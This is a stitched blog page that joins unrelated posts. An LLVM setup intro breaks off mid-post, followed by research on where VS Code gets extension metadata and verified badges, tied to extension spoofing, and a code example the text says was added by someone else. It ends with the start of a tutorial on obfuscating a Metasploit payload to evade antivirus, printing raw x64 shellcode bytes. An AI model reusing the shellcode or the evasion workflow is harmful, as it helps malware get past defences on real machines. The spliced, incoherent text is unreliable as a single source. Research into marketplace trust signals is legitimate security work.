wubba lubba dub dub.

This series of blogs is supposed to document my learning journey from a C/gcc nerd to a C++/LLVM chad. Expect this blog to be very informal, with the occasional rant, but it will document everything that I have learnt, including C++ internals, gimmicks, LLVM quirks and other references.

Setup

First thing first, we need to do some basic setup, starting with fetching the source code for the LLVM project:

git clone https://github.com/llvm/llvm-project.git

At the time of writing, the latest commit is 8aafa50c7a2dfb8ca1d5cdf8980f7f2d259779f5. In case you wanna follow along on the exact same version, just do:

git checkout 8aafa50c7a2dfb8ca1d5cdf8980f7f2d259779f5

Next, we install some basics with:

sudo apt install -y ninja-build build-essential subversion cmake python3-dev libncurses5-dev libxml2-dev libedit-dev swig doxygen graphviz xz-utils clang gdb git vim tmux

I would recommend running everything in a tmux session because some of these compilations take a while. That being said, let’s talk about LLVM (while my code compiles in the background).

Why LLVM?

post @ 2026-03-16

While preparing for my talk at Insomni Hack and reviewing the sinister-vsix project, I wondered: “Hey, how does VSCode fetch the metadata for these extensions?”. Just a small recap: in Task #4 we spoofed a Microsoft-published extension.

However, upon examining the extension code, I noticed a couple of things:

  • Metadata like stars, download count, etc. wasn't stored in the source code (which made sense)
  • “Where is the blue tick coming from?”

So, I decided to take a deeper look. This blog documents the result of research done quickly at an airport while I am on my way to present my fully finished 100+ slide deck (boy oh boy do I have to change those!) - but hopefully it’s not tooo incoherent.

VVhere is the metadata coming from?

First, we go searching for the source of the metadata. A bit of poking around later, I found that VSCode made a POST request to the marketplace API as such:

curl -X POST "https://marketplace.visualstudio.com/_apis/public/gallery/extensionquery" -H "Content-Type: application/json" -H "Accept: application/json;api-version=7.2-preview" -H "User-Agent: VSCode" -d '{
  "filters": [{
    "criteria": [
      { "filterType": 7, "value": "ms-vscode.live-server" }
    ],
    "pageSize": 1,
    "pageNumber": 1,
    "sortBy": 0,
    "sortOrder": 0
  }],
  "assetTypes": [],
  "flags": 950
}'

The only thing to note here is the value parameter, which is set to ms-vscode.live-server (this is always the extension identifier in the form publisher.extension-name, as in the example). On issuing this request, we get a big response, which (after prettifying) looks like this:

{
  "results": [
    {
      "extensions": [
        {
          "publisher": {
            "publisherId": "5f5636e7-69ed-4afe-b5d6-8d231fb3d3ee",
            "publisherName": "ms-vscode",
            "displayName": "Microsoft",
            "flags": "verified",
            "domain": "https://microsoft.com",
            "isDomainVerified": true
          },
          "extensionId": "4eae7368-ec63-429d-8449-57a7df5e2117",
          "extensionName": "live-server",
          "displayName": "Live Preview",
          "flags": "validated, public, preview",
          "lastUpdated": "2026-02-09T09:27:53.193Z",
          "publishedDate": "2021-06-21T20:33:59.11Z",
          "releaseDate": "2021-06-21T20:33:59.11Z",
          "shortDescription": "Hosts a local server in your workspace for you to preview your webpages on.",
          "versions": [
            {
              "version": "0.5.2026020901",
              "flags": "validated",
              "lastUpdated": "2026-02-09T09:27:53.193Z",
              "files": [
                {
                  <a_bunch_of_stuff>
                }
              ],
              "properties": [
                <a_bunch_of_github_links>
              ],
              "assetUri": "https://ms-vscode.gallery.vsassets.io/_apis/public/gallery/publisher/ms-vscode/extension/live-server/0.5.2026020901/assetbyname",
              "fallbackAssetUri": "https://ms-vscode.gallerycdn.vsassets.io/extensions/ms-vscode/live-server/0.5.2026020901/1770629024303"
            }
          ],
          "categories": [
            "Other"
          ],
          "tags": ["browser", "html", "live", "livepreview", "preview", "refresh", "reload"],
          "statistics": [
            {
              "statisticName": "install",
              "value": 11966368.0
            },
            {
              "statisticName": "averagerating",
              "value": 4.4358973503112793
            },
            {
              "statisticName": "ratingcount",
              "value": 78.0
            },
            {
              "statisticName": "trendingdaily",
              "value": 0.0022916290304234662
            },
            {
              "statisticName": "trendingmonthly",
              "value": 2.4470581465690677
            },
            {
              "statisticName": "trendingweekly",
              "value": 0.5461268883145507
            },
            {
              "statisticName": "updateCount",
              "value": 19214822.0
            },
            {
              "statisticName": "weightedRating",
              "value": 4.4381077195781415
            },
            {
              "statisticName": "downloadCount",
              "value": 53216.0
            }
          ],
          "deploymentType": 0
        }
      ],
      "pagingToken": null,
      "resultMetadata": [
        {
          "metadataType": "ResultCount",
          "metadataItems": [
            {
              "name": "TotalCount",
              "count": 1
            }
          ]
        }
      ]
    }
  ]
}
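To make the request and response above concrete, here is an added example (not from the original post and not VS Code's own code) that builds the same extensionquery body and pulls the publisher trust signals out of a response, showing that the verified badge and install counter are marketplace-side fields rather than anything shipped inside the extension. The sample response is constructed from the output above; the live lookup function needs network access.

```python
import json
from urllib import request
# Endpoint and headers copied from the curl command above.
MARKETPLACE_URL = "https://marketplace.visualstudio.com/_apis/public/gallery/extensionquery"
HEADERS = {"Content-Type": "application/json", "User-Agent": "VSCode",
           "Accept": "application/json;api-version=7.2-preview"}


def build_extension_query(extension_id: str) -> dict:
    # filterType 7 looks an extension up by its "publisher.name" id
    return {"filters": [{"criteria": [{"filterType": 7, "value": extension_id}],
                         "pageSize": 1, "pageNumber": 1, "sortBy": 0, "sortOrder": 0}],
            "assetTypes": [], "flags": 950}


def extract_trust_signals(response: dict) -> list:
    """Per extension: the marketplace-side fields behind the badge and the install counter."""
    out = []
    for result in response.get("results", []):
        for ext in result.get("extensions", []):
            pub = ext.get("publisher", {})
            # "flags" is a comma-separated string, e.g. "validated, public, preview"
            pub_flags = {f.strip() for f in pub.get("flags", "").split(",")}
            stats = {s["statisticName"]: s["value"] for s in ext.get("statistics", [])}
            out.append({
                "id": f"{pub.get('publisherName')}.{ext.get('extensionName')}",
                "publisher_display": pub.get("displayName"),
                "publisher_verified": "verified" in pub_flags,
                "domain_verified": bool(pub.get("isDomainVerified")),
                "domain": pub.get("domain"),
                "installs": int(stats.get("install", 0)),
            })
    return out


def query_marketplace(extension_id: str) -> dict:
    """Live lookup of one extension (needs network access)."""
    body = json.dumps(build_extension_query(extension_id)).encode()
    req = request.Request(MARKETPLACE_URL, data=body, headers=HEADERS, method="POST")
    with request.urlopen(req, timeout=15) as resp:
        return json.load(resp)


# Constructed sample, trimmed from the ms-vscode.live-server response above.
SAMPLE_RESPONSE = {"results": [{"extensions": [{
    "publisher": {"publisherName": "ms-vscode", "displayName": "Microsoft",
                  "flags": "verified", "domain": "https://microsoft.com",
                  "isDomainVerified": True},
    "extensionName": "live-server", "displayName": "Live Preview",
    "statistics": [{"statisticName": "install", "value": 11966368.0}]}]}]}
```

Running `extract_trust_signals(query_marketplace("ms-vscode.live-server"))` reproduces the same fields from the live API.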
post @ 2023-01-23

In this blog series, we explore how to obfuscate a Metasploit payload to avoid detection by antivirus engines and try to go invisible.

We will employ known techniques and see how they affect detection rates by uploading the compiled executable to AntiScan, as it does not submit the samples to the vendors.

Warning: Antiscan.me is no longer active, so some links might be broken.

Environment Setup

To begin with, we need some tools and setup to get started. The first thing is the unobfuscated shellcode we’ll be using:

RAW_PAYLOAD = [
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51,
0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52,
0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72,
0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b,
0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48,
0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44,
0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41,
0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1,
0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44,
0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44,
0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01,
0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59,
0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41,
0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48,
0xba, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d,
0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5,
0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0,
0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89,
0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x2e, 0x65, 0x78, 0x65, 0x00
]

This will be our base from where we start. The raw, untampered shellcode is placed in scripts/obfuscator.py. The Python file defines a class Obfuscator that takes our shellcode and obfuscates it to various levels; the output is used as the payload in implant.cpp.

Next up, we need to set up our development environment. For this, we need to install Visual Studio’s C/C++ Development Tools.

Once that is done, we can bring up any IDE of our choice and jump straight to coding. However, if you are using Visual Studio Code, I highly recommend having x64 Native Tools Command Prompt as your default. One way of doing this is to add the full path to vcvarsall.bat (the Visual Studio developer environment script; VsDevCmd.bat is the other option) to VS Code’s settings.json file as such:

{
    "workbench.colorTheme": "Default Dark+",
    // Backslashes in a JSON string must be doubled, otherwise settings.json fails to parse.
    // These two terminal settings are deprecated in recent VS Code releases in favour of
    // terminal.integrated.profiles.windows.
    "terminal.integrated.shell.windows": "cmd.exe",
    "terminal.integrated.shellArgs.windows": [
        "/k", "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Auxiliary\\Build\\vcvarsall.bat", "x64"
    ],
    "terminal.integrated.automationShell.windows": null,
    "explorer.confirmDelete": false
}